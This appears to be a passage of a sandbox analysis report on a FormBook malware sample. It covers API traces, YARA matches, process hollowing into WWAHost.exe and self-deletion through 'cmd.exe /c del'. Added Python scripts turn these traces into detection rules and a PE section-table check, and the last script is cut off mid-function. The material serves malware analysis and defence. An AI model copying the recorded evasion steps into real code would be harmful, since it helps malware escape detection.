          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E5A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E59670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E59610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E595F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E59560 NtWriteFile,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E59520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E5AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03249F30 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03249E00 NtReadFile,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03249E80 NtClose,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03249D50 NtCreateFile,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03249F2B NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03249DFB NtReadFile,
          Source: C:\Users\user\Desktop\444890321.exeCode function: 0_2_0040323C EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\444890321.exeCode function: 0_2_00404853
          Source: C:\Users\user\Desktop\444890321.exeCode function: 0_2_00406131
          Source: C:\Users\user\Desktop\444890321.exeCode function: 0_2_740D1A98
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_0041E071
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00401030
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_0041E5FC
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00402D87
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00402D90
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00409E30
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00402FB0
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009AB090
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A620A8
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009C20A0
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A628EC
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A6E824
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A51002
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009BA830
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009B99BF
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_0099F900
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009B4120
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A622AE
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A54AEF
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A4FA2B
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009CEBB0
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009CABD8
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A423E3
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A5DBD2
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A503DA
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A62B28
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009BA309
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009BAB40
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A54496
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009A841F
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A5D466
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009BB477
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009C2581
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A52D82
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009AD5E0
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A625DD
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A62D07
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00990D20
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A61D55
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A62EF7
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009B6E30
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A5D616
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A61FF1
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A6DFCE
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_1_0041E071
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_1_00401030
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_1_0041E5FC
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_1_00402D87
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_1_00402D90
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_1_00409E30
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_1_00402FB0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03ED03DA
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03EDDBD2
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E4EBB0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E3AB40
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03EE2B28
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03EE22AE
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03ECFA2B
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E34120
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E1F900
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03EE28EC
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E420A0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03EE20A8
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E2B090
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03EEE824
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E3A830
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03ED1002
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03EE1FF1
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03EEDFCE
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03EE2EF7
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E36E30
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03EDD616
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E2D5E0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03EE25DD
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E42581
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03EE1D55
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E10D20
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03EE2D07
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03EDD466
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E2841F
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_0324E071
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03232FB0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03239E30
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03232D87
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03232D90
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_0324E5FC
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: String function: 03E1B150 appears 54 times
          Source: C:\Users\user\Desktop\444890321.exeCode function: String function: 0041BBD0 appears 38 times
          Source: C:\Users\user\Desktop\444890321.exeCode function: String function: 0099B150 appears 136 times
          Source: 444890321.exe, 00000000.00000003.204714457.0000000009C6F000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 444890321.exe
          Source: 444890321.exe, 00000001.00000002.265683363.0000000002766000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameWWAHost.exej% vs 444890321.exe
          Source: 444890321.exe, 00000001.00000002.265126021.0000000000A8F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 444890321.exe
          Source: 444890321.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 0000000A.00000002.469354418.0000000003230000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.469354418.0000000003230000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.469573430.00000000032E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.469573430.00000000032E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000001.207643919.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000001.207643919.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.264934949.0000000000910000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.264934949.0000000000910000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.210395698.00000000023B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.210395698.00000000023B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.264873769.00000000008B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.264873769.00000000008B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.264645611.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.264645611.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.444890321.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.444890321.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.444890321.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.444890321.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.444890321.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.444890321.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.444890321.exe.23b0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.444890321.exe.23b0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.444890321.exe.23b0000.3.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.444890321.exe.23b0000.3.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.444890321.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.444890321.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@9/4@3/3
          Source: C:\Users\user\Desktop\444890321.exeCode function: 0_2_00404356 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
          Source: C:\Users\user\Desktop\444890321.exeCode function: 0_2_00402020 CoCreateInstance,MultiByteToWideChar,
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5880:120:WilError_01
          Source: C:\Users\user\Desktop\444890321.exeFile created: C:\Users\user\AppData\Local\Temp\nskAF62.tmp
          Source: 444890321.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\444890321.exeFile read: C:\Users\desktop.ini
          Source: C:\Users\user\Desktop\444890321.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: 444890321.exeMetadefender: Detection: 17%
          Source: 444890321.exeReversingLabs: Detection: 67%
          Source: C:\Users\user\Desktop\444890321.exeFile read: C:\Users\user\Desktop\444890321.exe
          Source: unknownProcess created: C:\Users\user\Desktop\444890321.exe 'C:\Users\user\Desktop\444890321.exe'
          Source: C:\Users\user\Desktop\444890321.exeProcess created: C:\Users\user\Desktop\444890321.exe 'C:\Users\user\Desktop\444890321.exe'
          Source: C:\Users\user\Desktop\444890321.exeProcess created: C:\Windows\System32\backgroundTaskHost.exe 'C:\Windows\system32\backgroundTaskHost.exe' -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\autochk.exe C:\Windows\SysWOW64\autochk.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\WWAHost.exe C:\Windows\SysWOW64\WWAHost.exe
          Source: C:\Windows\System32\backgroundTaskHost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\444890321.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\444890321.exeProcess created: C:\Users\user\Desktop\444890321.exe 'C:\Users\user\Desktop\444890321.exe'
          Source: C:\Windows\SysWOW64\WWAHost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\444890321.exe'
          Source: C:\Users\user\Desktop\444890321.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
          Source: Binary string: WWAHost.pdb source: 444890321.exe, 00000001.00000002.265580843.00000000026B0000.00000040.00000001.sdmp
          Source: Binary string: MusNotifyIcon.pdb source: explorer.exe, 00000004.00000000.238969976.000000000F6D2000.00000004.00000001.sdmp
          Source: Binary string: WWAHost.pdbUGP source: 444890321.exe, 00000001.00000002.265580843.00000000026B0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: 444890321.exe, 00000000.00000003.207642896.00000000099C0000.00000004.00000001.sdmp, 444890321.exe, 00000001.00000002.265126021.0000000000A8F000.00000040.00000001.sdmp, WWAHost.exe, 0000000A.00000002.470470953.0000000003F0F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: 444890321.exe, WWAHost.exe
          Source: Binary string: MusNotifyIcon.pdbGCTL source: explorer.exe, 00000004.00000000.238969976.000000000F6D2000.00000004.00000001.sdmp
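
The process tree recorded above (the sample re-launching itself, explorer.exe starting argument-less SysWOW64 binaries, and backgroundTaskHost.exe and WWAHost.exe each running cmd.exe /c del on the sample) is the part of this report a detection engineer would turn into rules. The script below is an added example, not Joe Sandbox output and not FormBook code: it runs three rules over process-creation events constructed from the report's "Process created" lines plus two benign events for noise. The rule names, the user-path and system-path heuristics, and the benign notepad.exe and build.exe events are this example's own assumptions.

```python
"""Run three detection rules over process-creation events modelled on this
report's "Process created" lines. Added example; the events are constructed."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    parent: str        # full path of the parent image ("unknown" if not seen)
    image: str         # full path of the created image
    cmdline: str = ""  # arguments only; empty when the binary was launched bare


USER_ROOT = "\\users\\"                         # assumption: user-writable paths live here
SYSWOW64 = "c:\\windows\\syswow64\\"
SYSTEM_DIRS = ("c:\\windows\\system32\\", SYSWOW64)
# cmd.exe /c del 'X.exe'   (single, double or no quotes)
DEL_RE = re.compile(r"/c\s+del\s+['\"]?([^'\"]+?\.exe)['\"]?\s*$", re.I)


def _base(path):
    return path.rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return (rule, detail) tuples for every event matching a rule."""
    findings = []
    # executables that actually ran from a user-writable path
    user_exes = {e.image.lower() for e in events if USER_ROOT in e.image.lower()}
    for e in events:
        img, par = e.image.lower(), e.parent.lower()
        # R1: a user-path executable starts a second copy of itself
        #     (report: 444890321.exe -> 444890321.exe, later hollowed)
        if img == par and USER_ROOT in img:
            findings.append(("self_reexec", e.image))
        # R2: explorer.exe starts a SysWOW64 binary with no arguments
        #     (report: explorer.exe -> autochk.exe and -> WWAHost.exe)
        if _base(par) == "explorer.exe" and img.startswith(SYSWOW64) and not e.cmdline.strip():
            findings.append(("explorer_spawns_bare_syswow64", _base(img)))
        # R3: a Windows system binary runs cmd.exe /c del on an executable that
        #     ran from a user path (report: backgroundTaskHost.exe and WWAHost.exe
        #     each delete the original sample)
        if _base(img) == "cmd.exe" and par.startswith(SYSTEM_DIRS):
            m = DEL_RE.search(e.cmdline)
            if m and m.group(1).lower() in user_exes:
                findings.append(("system_binary_deletes_user_exe",
                                 f"{_base(par)} -> del {m.group(1)}"))
    return findings


SAMPLE = r"C:\Users\user\Desktop\444890321.exe"
EXPLORER = r"C:\Windows\explorer.exe"
BTH = r"C:\Windows\System32\backgroundTaskHost.exe"
# Constructed from the report's process tree, plus two benign events as noise.
SAMPLE_EVENTS = [
    ProcEvent("unknown", SAMPLE),
    ProcEvent(SAMPLE, SAMPLE),
    ProcEvent(SAMPLE, BTH, "-ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca"),
    ProcEvent(EXPLORER, r"C:\Windows\SysWOW64\autochk.exe"),
    ProcEvent(EXPLORER, r"C:\Windows\SysWOW64\WWAHost.exe"),
    ProcEvent(BTH, r"C:\Windows\SysWOW64\cmd.exe", f"/c del '{SAMPLE}'"),
    ProcEvent(r"C:\Windows\SysWOW64\cmd.exe", r"C:\Windows\System32\conhost.exe",
              "0xffffffff -ForceV1"),
    ProcEvent(r"C:\Windows\SysWOW64\WWAHost.exe", r"C:\Windows\SysWOW64\cmd.exe",
              f"/c del '{SAMPLE}'"),
    ProcEvent(EXPLORER, r"C:\Windows\System32\notepad.exe"),                # benign noise
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\cmd.exe",
              r"/c del C:\Users\user\AppData\Local\Temp\build.exe"),       # benign: build.exe never ran
]

if __name__ == "__main__":
    for rule, detail in detect(SAMPLE_EVENTS):
        print(f"{rule:32} {detail}")
```

R3 is the high-confidence rule: a Windows system binary deleting an executable that earlier ran from a user directory is the self-delete step, and keying it on the set of executables that actually ran keeps an ordinary cleanup of a never-executed file from firing. R2 is a weaker heuristic on its own (explorer.exe does launch system binaries) and is best used to corroborate R1 or R3 within the same process tree.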

          Data Obfuscation:

          Detected unpacking (changes PE section rights)
          Source: C:\Users\user\Desktop\444890321.exeUnpacked PE file: 1.2.444890321.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
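
The finding above compares the section table of the file on disk (.text, .rdata, .data, .ndata, .rsrc) with the image found at 0x400000 after unpacking (a lone .text): a table that no longer matches the file is the signature of an image replaced or rewritten after load. The script below is an added example, not sandbox or sample code: it decodes the COFF characteristics this report lists for the file (LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED) and the per-section memory rights of a PE, and diffs two section tables. Both images are header-only PEs constructed here with struct to mirror the report's two layouts; the section flag values given to them, the dump's file characteristics, and the E/R/W letters are this example's own choices, not the report's notation.

```python
"""Decode PE file characteristics and section rights, and diff two section
tables (disk image vs. memory dump). Added example with constructed headers."""
import struct

FILE_FLAGS = {                      # IMAGE_FILE_HEADER.Characteristics bits
    0x0001: "RELOCS_STRIPPED", 0x0002: "EXECUTABLE_IMAGE",
    0x0004: "LINE_NUMS_STRIPPED", 0x0008: "LOCAL_SYMS_STRIPPED",
    0x0100: "32BIT_MACHINE", 0x2000: "DLL",
}
SCN_FLAGS = {0x20000000: "E", 0x40000000: "R", 0x80000000: "W"}  # IMAGE_SCN_MEM_EXECUTE/READ/WRITE
SCN_CNT_CODE = 0x00000020                                         # IMAGE_SCN_CNT_CODE
SECTION_FMT = "<8sIIIIIIHHI"                                      # IMAGE_SECTION_HEADER, 40 bytes
COFF_FMT = "<HHIIIHH"                                             # IMAGE_FILE_HEADER, 20 bytes


def build_pe(sections, file_chars):
    """Header-only PE32 (no section data): DOS header, PE signature, COFF
    header, a zeroed optional header, then one header per (name, characteristics)."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    opt = struct.pack("<H", 0x10B) + b"\0" * (0xE0 - 2)          # PE32 magic, rest zero
    coff = struct.pack(COFF_FMT, 0x14C, len(sections), 0, 0, 0, len(opt), file_chars)
    hdrs = b"".join(
        struct.pack(SECTION_FMT, name.encode().ljust(8, b"\0"),
                    0x1000, 0x1000 * (i + 1), 0x200, 0x400 + 0x200 * i, 0, 0, 0, 0, chars)
        for i, (name, chars) in enumerate(sections))
    return dos + b"PE\0\0" + coff + opt + hdrs


def parse(data):
    """Return (file-characteristic names, [(section, rights), ...]); rights is
    the subset of 'E', 'R', 'W' whose IMAGE_SCN_MEM_* bit is set."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    _m, nsec, _t, _p, _n, opt_size, chars = struct.unpack_from(COFF_FMT, data, e_lfanew + 4)
    flags = [name for bit, name in FILE_FLAGS.items() if chars & bit]
    sections, off = [], e_lfanew + 24 + opt_size                   # section table follows the optional header
    for _i in range(nsec):
        name, *_rest, sc = struct.unpack_from(SECTION_FMT, data, off)
        rights = "".join(letter for bit, letter in SCN_FLAGS.items() if sc & bit)
        sections.append((name.rstrip(b"\0").decode(), rights))
        off += struct.calcsize(SECTION_FMT)
    return flags, sections


def layout(data):
    """Compact 'name:rights;' string, one entry per section."""
    return "".join(f"{n}:{r};" for n, r in parse(data)[1])


def section_diff(disk, dump):
    """Sections whose rights differ between two images; '-' marks absence.
    A dump whose table no longer matches the file on disk means the image at
    that base was replaced or rewritten after load (hollowing / unpacking)."""
    d1, d2 = dict(parse(disk)[1]), dict(parse(dump)[1])
    return {n: (d1.get(n, "-"), d2.get(n, "-"))
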